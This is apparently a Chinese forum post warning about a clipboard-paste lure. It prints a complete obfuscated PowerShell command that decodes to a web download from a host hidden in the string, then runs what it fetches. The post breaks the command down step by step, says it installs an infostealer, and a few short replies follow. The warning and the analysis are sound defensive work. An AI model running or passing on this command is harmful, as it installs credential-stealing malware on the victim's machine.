CMD运行的:
powershell.exe -Wi MINI $JD='dUBLxgwGegPWexMRI.ccepIpZQ';$fQ=.($JD[((-68)+(97))]+$JD[22]+$JD[11]) ($JD.Substring(((99)-(81)),(18)/(2))) -uSEBa; .($fQ.Substring(1,3))($fQ);如果遇到这样的界面请立即关闭网页,清除剪切板。
代码行为深度解析
这段代码经过了混淆处理,旨在躲避安全软件的扫描。我们可以将其拆解来看:
隐藏窗口运行:powershell.exe -Wi MINI 是 -WindowStyle Minimized 的缩写,意图在后台静默运行,不让用户察觉。
字符串解密:
$JD='dUBLxgwGegPWexMRI.ccepIpZQ' 是原始乱码字符串。
通过复杂的数学运算(如 (-68)+(97) 等)定位字符。
解密后的核心指令通常是 IEX (Invoke-Expression),这个命令的作用是执行从远程服务器下载的任何指令。
远程下载并执行:
$JD.Substring(18, 9) 部分截取出的字符通常指向一个恶意链接。
-uSEBa 是 -UseBasicParsing 的缩写,常配合 Invoke-WebRequest 使用,从网络下载恶意二进制文件或木马。
最终目的:这段代码一旦执行,通常会自动下载并安装窃密木马(Infostealer),用于盗取你浏览器中的密码、Cookie、加密货币钱包或社交账号 Session。
醉里不知天在水 𢵗水捧月扰清波。
-
最近看到好几个发这个的了。你别说,这手段很有创新 -
最近看到好几个发这个的了。你别说,这手段很有创新
-
发现了,偶尔发了评论之后没自动刷新评论,以为没发出去就又点了一下,然后重复了
-
-
-
-
待我这几天观察一下
